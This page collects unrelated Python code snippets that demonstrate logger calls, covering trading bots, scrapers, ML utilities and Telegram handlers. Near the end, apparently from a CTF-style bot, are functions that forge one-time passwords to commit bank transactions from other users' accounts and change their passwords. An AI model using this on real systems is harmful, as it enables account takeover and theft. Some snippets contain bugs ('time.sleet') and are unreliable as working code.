Ejemplo n.º 1
0
    def check_order_made_status(self):
        while True:
            order = self.client.get_order(symbol=self.symbol,
                                          orderId=self.order_made_id)
            status = order['status']

            LOGGER.info(f'CURRENT ORDER STATUS: {status}')

            if self.order_made_time + timedelta(minutes=5) < datetime.now():
                if status == 'PARTIALLY_FILLED':
                    if self.order_made_time + timedelta(
                            minutes=20) < datetime.now():
                        self.order_made_status = status
                        self.order_executed = order
                        if order['side'] == 'BUY':
                            self.bot_status = 'BOUGHT'
                        if order['side'] == 'SELL':
                            self.bot_status = 'SOLD'
                        return
                if status == 'NEW':
                    self.client.cancel_order(symbol=self.symbol,
                                             orderId=self.order_made_id)
            if status in ['FILLED', 'CANCELED', 'REJECTED', 'EXPIRED']:
                self.order_made_status = status
                self.order_executed = order
                if status == 'FILLED':
                    if order['side'] == 'BUY':
                        self.bot_status = 'BOUGHT'
                    if order['side'] == 'SELL':
                        self.bot_status = 'SOLD'
                return
            LOGGER.info('WAITING 30 SECONDS TO CHECK ORDER AGAIN')
            time.sleet(30)
Ejemplo n.º 2
0
 def calculateHiddenLayerActivation(self, features):
     V = np.dot(features, np.transpose(self.inputWeights)) + self.bias
     if callable(self.activate_function):
         return self.activate_function(V)
     else:
         LOGGER.warn("activate_func could not callable,use sigmoid instead")
         return _internal_activation_funcs["sigmoid"](V)
Ejemplo n.º 3
0
 def spider(self):
     while True:
         if not self.uid_queue.empty():
             try:
                 uid = self.uid_queue.get()
                 print 'searching user %s follows...' % uid
                 total_page, people_list = self.travel_follow(uid)
                 if len(people_list):
                     self.db.friendships.save({
                         '_id':
                         uid,
                         'follow_list':
                         people_list,
                         'pages':
                         total_page,
                         'last_modify':
                         int(time.time())
                     })
                 else:
                     print 'no update for %s.' % uid
             except Exception, e:
                 LOGGER.error('User %s Follow Page Error: %s' % (uid, e))
         else:
             print 'uid queue empty'
             time.sleep(2)
Ejemplo n.º 4
0
def feature_decomposition(transformer, train_features, test_features):
    LOGGER.info("Beginning Dimensionality reduction using truncated SVD (%d features)" % transformer.n_components)
    train_dfeatures = transformer.fit_transform(train_features)
    #LOGGER.debug(["%6f " % transformer.explained_variance_ratio_[i] for i in range(5)])
    LOGGER.debug("%0.4f%% of total variance in %d features\n" % (
        100 * transformer.explained_variance_ratio_.sum(), transformer.n_components))
    return train_dfeatures, transformer.transform(test_features)
Ejemplo n.º 5
0
def getUser(email):
    user = User.query.filter_by(email=email).first()
    form = EditUserForm(g.user.email)
    if user is None:
        flash('Utilisateur %s introuvable' % email)
        users = User.query.order_by('last_connection desc').all()
        return render_template('getUsers.html', users=users, app_name=app_name)
    else:
        if form.validate_on_submit():
            try:
                g.user.firstname = form.firstname.data
                g.user.email = form.email.data
                g.user.timezone = form.timezone.data
                if form.new_password.data != '':
                    g.user.set_password(form.new_password.data)
                db.session.add(g.user)
                db.session.commit()
                flash(u'tes modifs\' sont bien enregistrées')
            except:
                db.session.rollback()
                flash(u'ERREUR : impossible d\'enregistrer tes modifs !')
                LOGGER.p_log(u'impossible d\'enregistrer les modifs', exception=exc_info())  
        else:
            for errors in form.errors.values():
                for error in errors:
                    flash(error)
                    print error
            form.firstname.data = g.user.firstname
            form.email.data = g.user.email
            form.timezone.data = g.user.timezone
        return render_template('getUser.html', app_name=app_name, user=user, form=form)
Ejemplo n.º 6
0
    def execute_search(self, url, pause=2):
        """
        Executes a search to Twitter for the given URL
        :param url: URL to search twitter with
        :return: A JSON object with data from Twitter
        """
        headers = {'user-agent': self.get_random_user_agent()}
        try:
            requests.packages.urllib3.disable_warnings(
                requests.packages.urllib3.exceptions.InsecureRequestWarning)
            r = requests.get(url=url,
                             proxies=self.proxies,
                             headers=headers,
                             allow_redirects=False,
                             verify=False,
                             timeout=30)
            LOGGER.info(url)
            time.sleep(pause)
            content = r.text
            dejson = json.loads(content)
            return dejson

        # If we get a ValueError exception due to a request timing out, we sleep for our error delay, then make
        # another attempt
        except ValueError as e:
            # print e.message
            # print "Sleeping for %i" % self.error_delay
            sleep(self.error_delay)
            return self.execute_search(url)
Ejemplo n.º 7
0
    def check_profit_status_bought_position(self):
        LOGGER.info('CHECKING PROFIT STATUS FOR BOUGHT POSITION')

        self.profit_check_value = round(
            self.actual_price * self.quoteqty, 6) - round((
                (self.actual_price * self.quoteqty) * self.max_trade_taxes), 6)

        position_bought_winnin = round(
            self.order_executed_quantity + self.stop_pair, 6)
        position_bought_losing = round(
            self.order_executed_quantity - self.stop_pair, 6)

        LOGGER.info(f'PROFIT CHECK VALUE: {self.profit_check_value}')

        LOGGER.info(f'VALUES OF STOP TO CHECK OF:')

        LOGGER.info(f'POSITION BOUGHT/WINNING: {position_bought_winnin}')
        LOGGER.info(f'POSITION BOUGHT/LOSING: {position_bought_losing}')

        if self.profit_check_value > position_bought_winnin:
            self.profit_status = 'WINNING'
        elif self.profit_check_value < position_bought_losing:
            self.profit_status = 'LOSING'
        else:
            self.profit_status = 'STANDING'
Ejemplo n.º 8
0
def call():
    period = 10
    while True:
        try:
            response = requests.get(url=URL_CHECK_CONNECTION, params=params)
            if response.status_code == 200:
                LOGGER.info(
                    'Send check connection request to Smartsite successful!')
                active = json.loads(response.content)['result']
                if active:
                    LOGGER.info('Gateway is online!')
                else:
                    LOGGER.info('Gateway is offline!')
                    subprocess.Popen(COMMAND_RESET_SERVICE_7688,
                                     shell=True,
                                     stdout=subprocess.PIPE)
            else:
                LOGGER.info('Response from Smartsite is not 200')
                subprocess.Popen(COMMAND_RESET_SERVICE_7688,
                                 shell=True,
                                 stdout=subprocess.PIPE)
        except Exception as ex:
            LOGGER.info('Error when check connection with message: %s',
                        ex.message)
            subprocess.Popen(COMMAND_RESET_SERVICE_7688,
                             shell=True,
                             stdout=subprocess.PIPE)
        time.sleep(period)
Ejemplo n.º 9
0
    def get_itunes_track_data(self, track_path, itunes_keys):
        # TODO: iTunes uses HTML encoding for some things (ampersands) and URL encoding for the rest
        with open('/Users/carmstrong/Music/iTunes/iTunes Music Library.xml', 'rb') as itunes_xml:
            tree = etree.parse(itunes_xml)

        itunes_track_path = 'file://' + urllib.quote(track_path.encode('utf-8'), safe="/(),'")
        location_node = tree.xpath('//string[text()="{}"]'.format(itunes_track_path))

        if not location_node:
            LOGGER.info('{} not found in iTunes XML file.'.format(itunes_track_path))
            return

        results = {}
        for itunes_key in itunes_keys:
            try:
                itunes_value = location_node[0].xpath("../key[text()='{}']".format(itunes_key))[0].getnext().text
                try:
                    itunes_value = int(itunes_value)
                except (ValueError, TypeError):
                    continue
                results.update({itunes_key: itunes_value})

            except IndexError:
                continue

        return results
Ejemplo n.º 10
0
    def _non_max_suppression(self, img, d):
        m, n = img.shape
        z = np.zeros((m, n), dtype=np.int32)
        angle = d * 180. / np.pi
        angle[angle < 0] += 180

        for i in range(1, m - 1):
            for j in range(1, n - 1):
                try:
                    q = 255
                    r = 255

                    if 0 <= angle[i, j] < 22.5 or \
                            157.5 <= angle[i, j] <= 180:
                        q = img[i, j + 1]
                        r = img[i, j - 1]
                    elif 22.5 <= angle[i, j] < 67.5:
                        q = img[i + 1, j - 1]
                        r = img[i - 1, j + 1]
                    elif 67.5 <= angle[i, j] < 112.5:
                        q = img[i + 1, j]
                        r = img[i - 1, j]
                    elif 112.5 <= angle[i, j] < 157.5:
                        q = img[i - 1, j - 1]
                        r = img[i + 1, j + 1]

                    if img[i, j] >= q and img[i, j] >= r:
                        z[i, j] = img[i, j]
                    else:
                        z[i, j] = 0

                except IndexError as e:
                    LOGGER.error(f"Reason: {e}")

        return z
Ejemplo n.º 11
0
    def generateBitDataForPackages(cls, json_data):
        for item in json_data:
            distros = filter(lambda elem: elem != 'packageName' and elem != 'version' and elem != 'url', item.keys())

            for i in range(0, len(distros)):
                distro_versions = item[distros[i]]
                for j in range(0, len(distro_versions)):
                    cls.distro_bit_mapping[distros[i] + '_' + distro_versions[j]] = '1'

            values = cls.getDistroBitRepData(cls.distro_bit_mapping)
            LOGGER.debug(cls.distro_bit_mapping)

            item['bit_rep_dec'] = int(''.join(values),2)
            item.pop('url',None)

            cls.distro_bit_mapping = {
                'UBUNTU_17.04': '0',
                'UBUNTU_16.10': '0',
                'UBUNTU_16.04': '0',
                'SUSE_LINUX_ENTERPRISE_SERVER_12-SP2': '0',
                'SUSE_LINUX_ENTERPRISE_SERVER_12-SP1': '0',
                'SUSE_LINUX_ENTERPRISE_SERVER_11-SP4': '0'
            }

        return json.dumps(json_data)
Ejemplo n.º 12
0
def remove_switch(mode: str) -> None:
    """Remove switch_mode cron jobs.

    Args:
        mode (str): either 'on' or 'off'

    Raises:
        ValueError: mode is not 'on' or 'off'

    """
    if mode not in ['on', 'off']:
        message = f'Invalid mode: {mode}'
        LOGGER.error(message)
        raise ValueError(message)

    trigger = 'sunset' if mode == 'on' else 'shutdown'

    mode = f'switch_{mode}'

    if not CONF[trigger]['remove']:
        message = f'{mode} jobs will not be removed.'
    else:
        jobs = CRONTAB.remove_script_jobs(f'{mode}')
        message = f"Jobs ({mode}) removed: {jobs}"
    LOGGER.info(message)
Ejemplo n.º 13
0
def main():
    # get zip codes
    zip_codes = [row.zip_code for row in session.query(ZipCode).all()]

    # # add leading 0's to zip codes due to excel's stupidness
    # zip_codes_df['zip_code'] = zip_codes_df['zip_code'].astype(str)
    # zip_codes_df['zip_code'] = zip_codes_df['zip_code'].apply(lambda x: '0' * (5 - len(x)) + x)

    current_month = datetime.date.today().month
    current_rows = session.query(Indeed).filter(
        extract('month', Indeed.date_created) == current_month).all()
    current_rows = [row.as_dict() for row in current_rows]
    existing_zip_codes = [row['zip_code'] for row in current_rows]
    remaining_zip_codes = [
        zip_code for zip_code in zip_codes
        if zip_code not in existing_zip_codes
    ]

    LOGGER.info(
        'Found {} rows for current month: {}. Extracting {} remaining zip codes'
        .format(len(current_rows), current_month, len(remaining_zip_codes)))

    for i, zip_code in enumerate(remaining_zip_codes):
        job_count = get_num_job_postings(zip_code)
        row = Indeed(zip_code=zip_code,
                     job_count=job_count,
                     date_created=datetime.date.today())
        session.merge(row)
        session.commit()

        LOGGER.info("Extracting zip code {} ({} of {})".format(
            zip_code, i, len(remaining_zip_codes)))
    session.close()
Ejemplo n.º 14
0
def acoustid_lookup(fingerprint, duration):
    results = acoustid.lookup(ACOUST_ID_API_KEY,
                              fingerprint,
                              duration,
                              meta='recordings + releasegroups')
    if results.get('results') and results['results'][0].get('recordings'):
        LOGGER.info('AcoustID result found!')
        recordings = results['results'][0]['recordings']
        recording = max(recordings, key=lambda x: len(x.keys()))
        recording_id = recording['id']
        recording_artists = recording['artists']
        recording_title = recording['title']
        album_artist = recording_artists[0]['name']
        artist = ''.join([
            artist['name'] + artist.get('joinphrase', '')
            for artist in recording_artists
        ])
        album = recording['releasegroups'][0][
            'title']  # TODO: the results of this are often inconsistent

        return {
            'musicbrainz_releasetrackid': recording_id,
            'title': recording_title,
            'artist': artist,
            'albumartist': album_artist,
            'album': album
        }

    else:
        LOGGER.info('No AcoustID results found.')
        return {}
Ejemplo n.º 15
0
def update_package_by_id(package_id):
    package = db_session.query(Package) \
        .filter(Package.pid == package_id,
                or_(Package.last_updated.is_(None),
                    Package.last_updated <= datetime.utcnow() - timedelta(hours=2))) \
        .options(load_only(Package.owner,
                           Package.repo,
                           Package.path,
                           Package.ptype,
                           Package.date)) \
        .first()
    if package:
        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)
        try:
            loop.run_until_complete(
                asyncio.ensure_future(update_package(package)))
            last_updated_prop = Property("last_updated",
                                         date_val=datetime.utcnow())
            db_session.merge(last_updated_prop)
            db_session.commit()
        except Exception as ex:
            LOGGER.error(ex)
            LOGGER.debug(traceback.format_exc())
        finally:
            loop.close()

    return redirect(url_for("index"))
Ejemplo n.º 16
0
def main():
    # get zip codes
    zip_codes = [row.zip_code for row in session.query(ZipCode).all()]

    # # add leading 0's to zip codes due to excel's stupidness
    # zip_codes_df['zip_code'] = zip_codes_df['zip_code'].astype(str)
    # zip_codes_df['zip_code'] = zip_codes_df['zip_code'].apply(lambda x: '0' * (5 - len(x)) + x)

    current_month = datetime.date.today().month
    current_rows = session.query(Indeed).filter(extract('month', Indeed.date_created) == current_month).all()
    current_rows = [row.as_dict() for row in current_rows]
    existing_zip_codes = [row['zip_code'] for row in current_rows]
    remaining_zip_codes = [zip_code for zip_code in zip_codes if zip_code not in existing_zip_codes]

    LOGGER.info('Found {} rows for current month: {}. Extracting {} remaining zip codes'.format(len(current_rows),
                                                                                                current_month,
                                                                                                len(
                                                                                                    remaining_zip_codes)))

    for i, zip_code in enumerate(remaining_zip_codes):
        job_count = get_num_job_postings(zip_code)
        row = Indeed(zip_code=zip_code, job_count=job_count, date_created=datetime.date.today())
        session.merge(row)
        session.commit()

        LOGGER.info("Extracting zip code {} ({} of {})".format(zip_code, i, len(remaining_zip_codes)))
    session.close()
Ejemplo n.º 17
0
def paginate_request(resource_uri, page_size, request_callback=None):
    page = 1
    data = []
    while True:
        param_prefix = "&" if "?" in resource_uri else "?"
        pagination_params = "{}page={}&page_size={}".format(
            param_prefix, page, page_size)
        api_uri = "{resource_uri}{pagination_params}".format(
            resource_uri=resource_uri, pagination_params=pagination_params)
        response = request(api_uri)
        response_data = response["data"]
        if request_callback:
            request_callback(response_data)
        data += response_data
        if not data:
            break
        total_count = response["meta"]["page"]["total_count"]
        page = response["meta"]["page"]["current_page"]
        records_fetched_count = page_size * page
        LOGGER.info("paginate_request: {}\t records fetched: {}/{}".format(
            resource_uri, records_fetched_count, total_count))
        if records_fetched_count >= total_count:
            break
        page += 1

    return data
Ejemplo n.º 18
0
 def run(self):
     flag = True
     try:
         self.socket.connect((HOST ,PORT))
     except error:
         print 'connection failed'
         return
     print 'connected to server %s:%s' % (HOST, PORT)
     while flag:
         try:
             if not self.controler.stoped:
                 if self.task == 'random':
                     uid, pages = self.request(action='getuid')
                     self.travel(uid=uid, pages=pages)
                     time.sleep(1)
                 elif self.task == 'target':
                     uid = self.request(action='gettargetuid')
                     self.target_travel(time.time()-24*60*60, uid=uid)
                     time.sleep(1)
                 else:
                     pass
             else:
                 time.sleep(1)
         except Exception, e:
             LOGGER.error('Unhandled Error:%s' % e)
Ejemplo n.º 19
0
def translate(context, update):
    if AUTO_TRANSLATE is True:
        # Checks if Language is English, if Confident it isn't Translate & Reply
        msg_text = context.effective_message.text
        lang, confidence = identifier.classify(msg_text)

        if lang != "en" and confidence >= 0.9:
            try:
                # Create Langpair to Show Translation API What We Need
                langpair = lang + '|en'

                translated_msg = requests.get(
                    'https://api.mymemory.translated.net/get',
                    params={
                        'q': msg_text,
                        'key': MYMEMORY_KEY, # API Key
                        'langpair': langpair,
                        'de': MYMEMORY_CONTACT # Contact Email
                        }).json()

                # Grab Translated Text from Nested JSON Response
                final_translation = translated_msg['matches'][0]['translation']

                # Respond with Translation to Non-English Message
                context.effective_message.reply_text(
                    messages.msg_translate.format(final_translation),
                    parse_mode='HTML')
            except Exception as e:
                LOGGER.warning(f'Translation Failed - {str(e)}')
        else:
            return
Ejemplo n.º 20
0
 def run(self):
     flag = True
     try:
         self.socket.connect((HOST, PORT))
     except error:
         print 'connection failed'
         return
     print 'connected to server %s:%s' % (HOST, PORT)
     while flag:
         try:
             if not self.controler.stoped:
                 if self.task == 'random':
                     uid, pages = self.request(action='getuid')
                     self.travel(uid=uid, pages=pages)
                     time.sleep(1)
                 elif self.task == 'target':
                     uid = self.request(action='gettargetuid')
                     self.target_travel(time.time() - 24 * 60 * 60, uid=uid)
                     time.sleep(1)
                 else:
                     pass
             else:
                 time.sleep(1)
         except Exception, e:
             LOGGER.error('Unhandled Error:%s' % e)
Ejemplo n.º 21
0
def gas(update, context):
    # Show Current Estimates for Gas prices
    remove_command(context, update)
    try:
        resp = requests.get("https://api.etherscan.io/api?module=gastracker&action=gasoracle")
        if resp.status_code == 200:
            prices = resp.json()

            low = prices['result']['SafeGasPrice']
            standard = prices['result']['ProposeGasPrice']
            fast = prices['result']['FastGasPrice']

            message = messages.msg_gas.format(fast, standard, low)

            gas_msg = context.bot.send_message(
                chat_id=update.effective_message.chat.id,
                text=message,
                parse_mode=ParseMode.HTML,
                disable_web_page_preview=True
                )
            cleaner(context, gas_msg)

    except TypeError as e:
        LOGGER.warning(f'Rate Limited - {str(e)}')
        message = "Sorry Unable to Fetch Gas Estimates Right Now..."
        gas_message = context.bot.send_message(
            chat_id=update.effective_message.chat.id,
            text=message,
            parse_mode=ParseMode.HTML
            )
        cleaner(context, gas_message)
Ejemplo n.º 22
0
 def run(self):
     while True:
         try:
             if not self.data_queue.empty():
                 data = self.data_queue.get()
                 if hasattr(data, 'target_statuses'):
                    for status in data.target_statuses:
                       exist = self.db['target_statuses'].find({'_id': status['_id']}).count()
                       if not exist:
                           self.db['target_statuses'].insert(status)
                 if hasattr(data, 'statuses'):
                     posts = []
                     for status in data.statuses:
                         exist = self.db.statuses.find({'_id': status['_id']}).count()
                         if not exist:
                             posts.append(status)
                     if len(posts):
                         self.db.statuses.insert(posts)
                 if hasattr(data, 'users'):
                     for user in data.users:
                         exist = self.db.users.find_one({'_id': user['_id']})
                         if not exist:
                             self.users.insert(user)
                 if hasattr(data, 'user'):
                     self.db.users.save(data.user)
             else:
                 if self.stoped:
                     break
                 else:
                     time.sleep(0.5)
         except Exception, e:
             LOGGER.error(e)
             continue
Ejemplo n.º 23
0
def do_synchronize_generate(mirrors):
    yield "Starting synchronize...\n"

    for mirror in mirrors:
        yield "Synchronizing '{}'\n".format(mirror.text_val)
        try:
            resp = requests.get(mirror.text_val)
            if resp.status_code != 200:
                yield "Errornous http status code: {}. Skipping this mirror.\n".format(
                    resp.status_code)
                continue

            packages_mirror = json.loads(resp.content)
            packages = db_session.query(Package).options(
                load_only(Package.owner, Package.repo, Package.path,
                          Package.ptype)).all()
            packages_added = 0
            for package_mirror in packages_mirror:
                found = False
                if "path" not in package_mirror:
                    package_mirror["path"] = None
                for package in packages:
                    if package_mirror["owner"] == package.owner \
                            and package_mirror["ptype"] == package.ptype \
                            and package_mirror["repo"] == package.repo \
                            and package_mirror["path"] == package.path:
                        found = True
                        break
                if not found:
                    LOGGER.info("Synchronize: adding %s", package_mirror)
                    insert_package(package_mirror["owner"],
                                   package_mirror["repo"],
                                   package_mirror["ptype"],
                                   package_mirror["path"],
                                   dateutil.parser.parse(
                                       package_mirror["added"]),
                                   commit=False)
                    yield "adding {}\n".format(package_mirror)
                    packages_added += 1

            if packages_added > 0:
                try:
                    db_session.commit()
                except Exception as ex:
                    db_session.rollback()
                    LOGGER.error(ex)
                    LOGGER.debug("{}: {}\n".format(ex, traceback.format_exc()))
                    yield "{}\n".format(ex)
            else:
                db_session.rollback()
            yield "Mirror '{}': {} packages added.\n".format(
                mirror.text_val, packages_added)
        except Exception as ex:
            LOGGER.error(ex)
            error = "{}: {}\n".format(ex, traceback.format_exc())
            LOGGER.debug(error)
            yield error

    yield "Synchronization done.\n"
Ejemplo n.º 24
0
def remove_command(context, update):
    # Delete Bot Commands from Group Members
    msg = update.effective_message
    try:
        msg.delete()
        LOGGER.info(f'CMD Message Deleted - {msg.message_id}')
    except BaseException as e:
        LOGGER.info(f'CMD Message Already Deleted - {str(e)}')
Ejemplo n.º 25
0
    def check_profit_status(self):
        if self.bot_status == 'BOUGHT':
            self.check_profit_status_bought_position()

        if self.bot_status == 'SOLD':
            self.check_profit_status_sold_position()

        LOGGER.info(f'PROFIT STATUS: {self.profit_status}')
Ejemplo n.º 26
0
 def get_instance(cls):
     LOGGER.debug('get_instance: In get_instance')
     if not cls.INSTANCE:
         cls.INSTANCE = PackageSearch()
         cls.INSTANCE.supported_distros = cls.loadSupportedDistros()
         cls.INSTANCE.package_data = cls.loadPackageData()
         LOGGER.debug('get_instance: Creating singleton instance in get_instance')
     return cls.INSTANCE
Ejemplo n.º 27
0
def handle(fd, address):
    global data_queue
    global uid_queue
    global target_uid_queue
    db = getDB()
    LOGGER.info('connection accepted from %s:%s' % address)
    while True:
        data = fd.readline()
        if not data:
            break
        data = data[:-2]
        r = json.loads(data, object_hook=_obj_hook)
        if hasattr(r, 'action'):
            action = r.action
        else:
            break
        if action == 'postdata':
            try:
                data_queue.put(r.data)
                fd.write(json.dumps({'status': 'ok'})+'\r\n')
            except:
                fd.write(json.dumps({'error': 'bad request data'})+'\r\n')
            fd.flush()
        elif action == 'getuid':
            if not uid_queue.empty():
                uid = uid_queue.get()
                pages = 0
                user = db.users.find_one({'_id': uid})   
                try:
                    pages = user['pages']
                except:
                    pages = 0
                fd.write(json.dumps({'uid': uid, 'pages': pages})+'\r\n')
            else:
                fd.write(json.dumps({'error': 'uid queue empty'})+'\r\n')
            fd.flush()
        elif action == 'getuserinfo':
            try:
                name = r.data
                user = db.users.find_one({'name': name})
                try:
                    u = {'_id': user['_id'], 'gender': user['gender'], 'location': user['location']}
                    fd.write(json.dumps({'user': u})+'\r\n')
                except:
                    fd.write(json.dumps({'error': 'not found'})+'\r\n')
            except:
                fd.write(json.dumps({'error': 'bad request data'})+'\r\n')
            fd.flush()
        elif action == 'gettargetuid':
            uid = target_uid_queue.get()
            if uid:
                fd.write(json.dumps({'uid': uid})+'\r\n')
            else:
                fd.write(json.dumps({'error': 'target uid queue empty'})+'\r\n')
            fd.flush()
        else:
            break
    LOGGER.info('end connection %s:%s' % address)
Ejemplo n.º 28
0
 def save(self):
     self.sync()
     if self.easyID3.is_modified:
         LOGGER.info('Saving file changes...')
         self.easyID3.save()
     if session.is_modified(self.model):
         LOGGER.info('Committing model changes...')
         session.merge(self.model)
         session.commit()
Ejemplo n.º 29
0
def delete_bot_message(update, context):
    try:
        context.bot.deleteMessage(
            chat_id=update.effective_message.chat.id,
            message_id=update.effective_message.message_id
        )
    except BaseException as e:
        LOGGER.warning(f'<delete_bot_message> Exception Occured: {str(e)}')
        pass
Ejemplo n.º 30
0
def request(api_uri, ignore_404=False):
    request = requests.get("{}{}".format(API_URL, api_uri))
    if request.status_code == 404 and ignore_404:
        LOGGER.error("request failed 404 - {}".format(api_uri))
        return
    if not request.ok:
        raise Exception("request failed with status: {} for url: {}".format(
            request.status_code, request.url))
    return request.json()
Ejemplo n.º 31
0
def check_command_send_rpc(command):
    try:
        return utils._check_command_send_rpc(command.get('device', None),
                                             command.get('command', None))
    except Exception as ex:
        print(ex.message)
        LOGGER.error(
            'Error at check_command_send_rpc function with message: %s',
            ex.message)
Ejemplo n.º 32
0
 def gettargetuid(self):
     self.socket.sendall(json.dumps({'action': 'gettargetuid'})+'\r\n')
     res = self.socket.recv(1024)
     r = json.loads(res, object_hook=_obj_hook)
     if hasattr(r, 'error'):
         LOGGER.error(r.error)
         return None
     else:
         return r.uid
Ejemplo n.º 33
0
 def gettargetuid(self):
     self.socket.sendall(json.dumps({'action': 'gettargetuid'}) + '\r\n')
     res = self.socket.recv(1024)
     r = json.loads(res, object_hook=_obj_hook)
     if hasattr(r, 'error'):
         LOGGER.error(r.error)
         return None
     else:
         return r.uid
Ejemplo n.º 34
0
def webhookHandler(event):
    """ Travese to webhook handler and let it deal with the error.
    """
    try:
        return event.error['context'].restrictedTraverse(
            '@@logbook_webhook')(event)
    except Exception, e:
        LOGGER.error(
            "An error occured while notifying with webhooks: %s" % str(e))
Ejemplo n.º 35
0
def mailHandler(event):
    """ notify this error
    """
    try:
        return event.error['context'].restrictedTraverse(
            '@@logbook_mail')(event)
    except Exception, e:
        LOGGER.error(
            "An error occured while notifying recipients: %s" % str(e))
Ejemplo n.º 36
0
def prepare_features(train_movies, test_movies):
    LOGGER.debug("Training samples: %d" % len(train_movies))
    # Extract
    vectorizer = CountVectorizer(decode_error=u'replace')
    (train_features, train_labels, test_features, test_labels) = feature_extraction_sklearn(
        vectorizer, train_movies, test_movies
    )
    LOGGER.debug("Original feature vectors size: %d" % csr_matrix(train_features[-1]).toarray().size)
    return train_features, train_labels, test_features, test_labels
Ejemplo n.º 37
0
def classify(classifier, train_features, train_labels, test_features,
             test_labels, desc="Linear classifer"):
    LOGGER.info("Beginning %s" % desc)
    classifier.fit(train_features, train_labels)
    results = classifier.predict(test_features)
    correct = get_correct_num(results, test_labels)
    LOGGER.info("%s predicted %d/%d correctly (%0.3f%% accuracy)\n" % (
        desc, correct, len(test_labels), correct / len(test_labels) * 100))
    return results
Ejemplo n.º 38
0
def rescale_features(train, test):
    LOGGER.info("Rescaling feature matrices")
    if issparse(train):
        LOGGER.info("Converting feature matrices from sparse to dense")
        train = csr_matrix(train).todense()
        test = csr_matrix(test).todense()
    scaler = StandardScaler(with_mean=False)
    train_features_rs = scaler.fit_transform(train)
    return train_features_rs, scaler.transform(test)
Ejemplo n.º 39
0
 def get_instance(cls):
     LOGGER.debug('get_instance: In get_instance')
     if not cls.INSTANCE:
         cls.INSTANCE = PackageSearch()
         cls.INSTANCE.DISTRO_BIT_MAP = cls.loadSupportedDistros()
         cls.INSTANCE.package_data = cls.loadPackageData()
         cls.INSTANCE.local_cache = {}
         cls.INSTANCE.cache_keys = []
         LOGGER.debug('get_instance: Creating singleton instance in get_instance')
     return cls.INSTANCE
Ejemplo n.º 40
0
def iteration_request(id, uri_templete, ignore_404, request_callback):
    resource_uri = uri_templete.format(id)
    response = request(resource_uri, ignore_404=ignore_404)
    if response and response['data']:
        if request_callback:
            request_callback(response['data'])
        LOGGER.info("{} - done".format(resource_uri))
        return response['data']
    LOGGER.info("{} - response empty".format(resource_uri))
    return {}
Ejemplo n.º 41
0
 def acquire_track_model(self):
     # determine if fingerprint present, if not generate
     if not self.fingerprint:
         self.query_fingerprint()
     # use fingerprint to query model
     self.model = session.query(SavedTrack).get(self.fingerprint)
     # if 0 results, create model
     if not self.model:
         LOGGER.info('Track not found in database; creating...')
         self.model = SavedTrack()
Ejemplo n.º 42
0
def check_mentions(api) -> None:
    """Checks for new mentions and favorite this mentions."""
    # Retrieve the last 20 mentions.
    mentions = api.mentions_timeline()
    for tweet in mentions:
        if not tweet.favorited:
            try:
                tweet.favorite()
                LOGGER.info(f'Tweet from {tweet.user.name} favorited!')
            except Exception:
                LOGGER.error('Error on fav', exc_info=True)
Ejemplo n.º 43
0
def decompose_tsvd_target(transformer, train_features, test_features, target_cuml_var_ratio=0.9):
    LOGGER.info("Aiming for %.3f%% cumulative total sum of variance" % (target_cuml_var_ratio * 100))
    #transformer = TruncatedSVD(n_components=n_features)
    train_d, test_d = feature_decomposition(transformer, train_features, test_features)
    if sum(transformer.explained_variance_ratio_) < target_cuml_var_ratio:
        return decompose_tsvd_target(
            TruncatedSVD(n_components=(transformer.n_components*2)),
            train_features, test_features,
            target_cuml_var_ratio)
    LOGGER.debug("Reduced feature vectors size: %d" % csr_matrix(train_features[-1]).toarray().size)
    return transformer, train_d, test_d
Ejemplo n.º 44
0
def main():
    LOGGER.info('Extracting building permit data...')
    post_data_list = generate_post_data((1, 12), (2005, 2015))

    pool = ThreadPool(5)
    results = pool.map(get_census_reponse, post_data_list)
    results_array = parse_results(results)

    for result in results_array:
        session.merge(BuildingPermit(**result))

    session.commit()
Ejemplo n.º 45
0
    def do_otp(self, obj):
        data = self._pre_otp(obj)
        if data is False:
            return False

        step3 = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST),
            urllib.urlencode({
                'step': 'step3'
            })
        )
        step4 = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST),
            urllib.urlencode({
                'step': 'step4'
            })
        )
        # Case:
        # 1) No otp
        if 'Commit transaction.' in data:
            LOGGER.info('No otp')
            data = my_url_open(obj.opener, step3)
        # 2) SmartCard otp
        elif 'One-time password:'******'Smart card otp')

            data = my_url_open(obj.opener, step4)
        # 3) Brute otp
        elif 'One-time password (#' in data:
            tmp_ticket = RE_TICKET.search(data)
            if not tmp_ticket:
                return False
            tmp_ticket = tmp_ticket.group(1)
            step_OTP1 = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST),
                urllib.urlencode({
                    'step': 'step3',
                    'OTP': obj.gen_otp(tmp_ticket, 2)
                })
            )
            step_OTP2 = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST),
                urllib.urlencode({
                    'step': 'step3',
                    'OTP': obj.gen_otp(tmp_ticket, 3)
                })
            )
            data = my_url_open(obj.opener, step_OTP1)
            data += my_url_open(obj.opener, step_OTP2)
            data = my_url_open(obj.opener, step4)
        else:
            LOGGER.error('Bad transaction page: ')
            LOGGER.debug('%r', data)
        result = 'Transaction committed!' in data
        if result:
            LOGGER.info('Transaction from: %s', obj.number)
        return result
Ejemplo n.º 46
0
def five_ab(train_features, train_labels, test_features, test_labels):
    # Reduce feature dimensions
    transformer = TruncatedSVD(n_components=N_FEATURES)
    transformer, train_features, test_features = decompose_tsvd_target(
        transformer, train_features, test_features, TARGET_CUM_VAR_RATIO
    )
    #train_features, test_features = feature_decomposition(transformer, train_features, test_features)
    LOGGER.debug("Reduced feature vectors size: %d" % csr_matrix(train_features[-1]).toarray().size)

    # Rescale features
    train_features, test_features = rescale_features(train_features, test_features)
    return train_features, train_labels, test_features, test_labels
Ejemplo n.º 47
0
def persist_zillow_metrics(df):
    metrics_df = df.drop(['city', 'metro', 'state', 'county'], axis=1)
    session.query(ZillowMetrics).delete()  # TODO: should append to existing data in case zillow changes something
    session.commit()
    insert_chunk = 100000
    index_start = 0
    while index_start < len(metrics_df):
        LOGGER.info('Persisting Zillow Metrics rows: {} of {}'.format(index_start + insert_chunk,
                                                                      len(metrics_df)))
        engine.execute(
            ZillowMetrics.__table__.insert(metrics_df[index_start:index_start + insert_chunk].to_dict('records')))
        index_start += insert_chunk
Ejemplo n.º 48
0
 def do_change(self, obj):
     LOGGER.info('Changing password for: %s', obj.user)
     req = urllib2.Request('http://{0}/change_password.php'.format(TARGET_HOST),
         urllib.urlencode({
             'password': obj.password,
